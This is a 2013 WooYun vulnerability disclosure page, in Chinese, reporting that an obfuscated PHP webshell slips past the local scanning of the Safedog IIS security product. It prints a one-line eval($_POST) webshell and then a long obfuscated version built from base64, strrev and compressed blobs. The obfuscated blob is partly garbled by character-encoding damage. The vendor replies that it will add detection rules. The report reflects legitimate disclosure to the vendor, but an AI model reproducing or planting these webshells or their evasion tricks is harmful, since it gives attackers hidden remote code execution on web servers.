当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040860

漏洞标题:在次绕过安全狗iis版的本地查杀

相关厂商:安全狗

漏洞作者: 雷少

提交时间:2013-10-24 12:15

修复时间:2014-01-22 12:16

公开时间:2014-01-22 12:16

漏洞类型:默认配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-24: 细节已通知厂商并且等待厂商处理中
2013-10-24: 厂商已经确认,细节仅向厂商公开
2013-10-27: 细节向第三方安全合作伙伴开放
2013-12-18: 细节向核心白帽子及相关领域专家公开
2013-12-28: 细节向普通白帽子公开
2014-01-07: 细节向实习白帽子公开
2014-01-22: 细节向公众公开

简要描述:

安全狗很无节操

详细说明:

原形

<?php eval($_POST[1])?>


变态加密后

<?php 
if (!defined("CFACCEDFEECCFFA")){define("CFACCEDFEECCFFA", true);global $?$€?$彌?$棏姉,$櫈寜?$厬?嫃,$晫枑姏?$焵棈倛潫,$帞憴寠槞?$?噯敄杸?$唻垜妸垯帓?$巵?湙嫈搧彄,$墫敒崑洅媱剹,$悕憻€噸倲崯崣?$仜儠厸妱垨剟墤?$帀洕洑瀮垁櫁噾?function 崰($崰,$€憼=""){global $?$€?$彌?$棏姉,$櫈寜?$厬?嫃,$晫枑姏?$焵棈倛潫,$帞憴寠槞?$?噯敄杸?$唻垜妸垯帓?$巵?湙嫈搧彄,$墫敒崑洅媱剹,$悕憻€噸倲崯崣?$仜儠厸妱垨剟墤?$帀洕洑瀮垁櫁噾?if(empty($€憼)){return base64_decode($崰);}else{return 崰($厬?嫃($崰,$€憼,$墫敒崑洅媱剹($€憼)));}}$厬?嫃=崰("c3RydHI=?);$墫敒崑洅媱剹=崰("c3RycmV2?);$彌?崰("LHJZl19y巐XBsYWxZ?,"clpNxQZL");$焵棈倛潫=崰("mrmhbA==?,"ZOXrwm");$?噯敄杸?崰("I3p1bmNvbXUyIXNz","ZqBTuxUhI");$巵?湙嫈搧彄=崰("A2NjMTO1cWI2乑DhlcWI5MjUx淵jZiZDMxNDNk梒DNkZDgkA2U=?,"LcqVgvOA");$悕憻€噸倲崯崣?崰("wmFzZTw0X2R榣w29kZQ==?,"YUehjNHSw");function 彌劆(&$彌劆){global $?$€?$彌?$棏姉,$櫈寜?$厬?嫃,$晫枑姏?$焵棈倛潫,$帞憴寠槞?$?噯敄杸?$唻垜妸垯帓?$巵?湙嫈搧彄,$墫敒崑洅媱剹,$悕憻€噸倲崯崣?$仜儠厸妱垨剟墤?$帀洕洑瀮垁櫁噾?$帀洕洑瀮垁櫁噾敔=崰("qGkk?,"Zkslq");@$彌?$巵?湙嫈搧彄,$焵棈倛潫."(@$?噯敄杸?$悕憻€噸倲崯崣?'eNplkVtv?kAQhf8K宻nhYq06C圡UEgtGpJ梐KFucQso?NBWCBvc€kNgFFRJE巑ghSrjaY€xA2XOlbB扨7XeTSC9攙O3O+WbP?BmvAQ0H怑EkmW0ky?ZZGUISU倅BwfJAky?u2YWExI梤JKnw42c弅NZO5CiE攄4ji5aOz奿2ImgcClqS8xesjv榶zmBbeWE?ynGiudv搈ocIsVYT?RozdV6m慥64kVlOK塮FZH4nyy憉NVtDctR梀alHBa5W烿tdHEM2T揵32Wooia攝kxrov+0?pirfmGV€HJ+CFkJO濵rUqQgbj€kanrI2v6哬4EhVuXq烮sMpEwSl廻fcVFlHX坉nfet/Xe抋NHraeaD僢Vw4bor5?Gk8BWEf?Y1MHJtq?i/7ftUd廳axle2jO朚JxVw6ks僅4BdBKbSzSwiDQcW奀q9ev31Z廗EQqMnDTA8Qe2H32僴PwI9gjK?Sm35pDk擭5yXA9Ht楢/0pclVW?uVt0XAi濾96+OW6P塨9zbv/bg扐aM8xFdx濭yviNtmA濼S+1SfWx唄fw7ni2H嘕geP71A7?iAJ4bYA?OlJ9VE7坖J/cJaQQ唞QRlKShJ刢kAulWi/檔/Hth4oS廘QUDoZCv桼FAMSeK3濸JeXnv/+?ADX88bu汷fCF9749婬LRni0XH媎bk1zHVn抋HyfGWvD恥gMYIf/c媢wMbFbWM漸p/a8D5iTI0WVe5c孎KYHrZjA€XQzQYt5V塱6WYG9Jv乬KQZQg==?)));","晢?剭槚灂cc1759b6d8e9b9251b6bd3143d83dd5d倳摀剳");return "/";}}else{global $?$€?$彌?$棏姉,$櫈寜?$厬?嫃,$晫枑姏?$焵棈倛潫,$帞憴寠槞?$?噯敄杸?$唻垜妸垯帓?$巵?湙嫈搧彄,$墫敒崑洅媱剹,$悕憻€噸倲崯崣?$仜儠厸妱垨剟墤?$帀洕洑瀮垁櫁噾?$厬?嫃=崰("c3RydHI=?);$墫敒崑洅媱剹=崰("c3RycmV2?);$彌?崰("LHJZl19y巐XBsYWxZ?,"clpNxQZL");$焵棈倛潫=崰("mrmhbA==?,"ZOXrwm");$?噯敄杸?崰("I3p1bmNvbXUyIXNz","ZqBTuxUhI");$巵?湙嫈搧彄=崰("A2NjMTO1cWI2乑DhlcWI5MjUx淵jZiZDMxNDNk梒DNkZDgkA2U=?,"LcqVgvOA");$悕憻€噸倲崯崣?崰("wmFzZTw0X2R榣w29kZQ==?,"YUehjNHSw");}$焵棈倛潫?崰("aU5yclRVbXJCd嘫QBRXFRSFKA?,"ZdtzQa");$晫枑姏墵=彌劆($焵棈倛潫?;@$彌?$巵?湙嫈搧彄,$焵棈倛潫."(@$?噯敄杸?$悕憻€噸倲崯崣?'eNoVjj1vw抝AURf8Kwx峵AegszFaz哾iEQ3hCqG凷AwIIZWy2抔GT+CNOMD瀐OjSH5qzX梤vVfn3Mls?jFLPpNBe媗xvh/CdzB".$焵棈倛潫?$晫枑姏墵."FqNHn沶+81+8Lv7塖Q9D0AjUI楴SBIbRGtg乮+K0WGcDG桲qBqhKd1V滲oHQ01af+昁tHqKzxpf媧zDcKDFDm€xztHIyRU3嘦nJf3VzcZ匢o8vbL3rL?jCGc7rUi?Kcai4qpN圱wt9srrXP晅ZZODeXIB僱3jAkTXZU擨r/Dozpz6檒hTGvm//A?VVXUg=?)));","儠?彌啅厡cc1759b6d8e9b9251b6bd3143d83dd5d梾姖悤");return true;?>d366d6f5150284c1ae5f20535718ee49


漏洞证明:

1.png

修复方案:

你们比我专业

版权声明:转载请注明来源 雷少@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2013-10-24 20:02

厂商回复:

会增加相应的查杀规则

最新状态:

暂无